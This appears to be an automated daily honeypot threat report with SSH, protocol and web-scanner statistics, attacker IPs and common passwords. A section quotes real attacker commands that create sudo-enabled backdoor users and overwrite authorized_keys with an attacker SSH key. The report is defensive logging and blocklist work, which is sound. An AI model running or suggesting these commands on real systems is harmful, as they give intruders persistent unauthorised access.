Saturday, 23 May 2026 πŸ’€ critical

Daily Threat Report

3,086 SSH Connections
2,994 Login Attempts
1084 Commands Run
316 SSH Unique IPs
8,996 Protocol Events
35 Protocol IPs
48 Web Hits
25 Web Service IPs

Top Attacker IPs

  1. 🌐 45.148.10.240 BGPβ†—
  2. 🌐 87.251.64.176 BGPβ†—
  3. 🌐 27.79.3.90 BGPβ†—
  4. 🌐 116.110.156.35 BGPβ†—
  5. 🌐 4.246.117.137 BGPβ†—

Top Passwords Tried

  1. 345gs5662d34
  2. 3245gs5662d34
  3. admin
  4. 123456
  5. 1234

🌐 WEB HONEYPOT β€” HoneyAI HTTP

AI-generated fake HTTP responses served to 48 scanner requests from 25 unique IPs (local, offline).

Top Paths Probed

  1. /
  2. /login
  3. /SDK/webLanguage
  4. /.well-known/security.txt
  5. /zc?action=getInfo

Top User-Agents

  1. Go-http-client/1.1
  2. Mozilla/5.0 (Windows NT 10.0
  3. Win64
  4. x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  5. Mozilla/5.0 (compatible
  6. CensysInspect/1.1
  7. +https://about.censys.io/)
  8. Mozilla/5.0 zgrab/0.x
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
β†’ 65 IPs β†’ AbuseIPDB  (community confidence scores updated)
β†’ 65 IPs β†’ AlienVault OTX  (pulse indicators added)
β†’ 65 IPs β†’ Blocklist.de  (auto-ban list updated)
β†’ 65 IPs β†’ DShield/SANS  (global threat feed updated)

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

πŸ”‘ Hall of Shame β€” Passwords

345gs5662d34
3245gs5662d34
admin
password
ubuntu

πŸ’» Commands They Tried

apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 FDX3YvE6) system && sudo usermod -aG sudo system
apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 X6Ah8NdN) system && sudo usermod -aG sudo system
/bin/./uname -s -v -n -r -m
cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
echo CANARY-b258944ae9af040c-AWK$(awk BEGIN{print 7*191} 2>/dev/null)-PY$(python3 -c print(1+1) 2>/dev/null||python -c print(1+1) 2>/dev/null)-NPROC$(nproc 2>/dev/null)-END && lscpu -J && echo -e X6Ah8NdN\nX6Ah8NdN | passwd && curl https://ipinfo.io/org --insecure -s && free -h && apt

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 23 de May de 2026. Recorded 3086 SSH connections on the Cowrie honeypot and 8996 multi-protocol events on OpenCanary, from 351 unique IPs. 65 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 2994 login attempts from 316 unique IPs. Attackers executed 1084 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 8996 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 35 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 48 HTTP requests from real scanners across 25 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 8184 alerts from 468 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’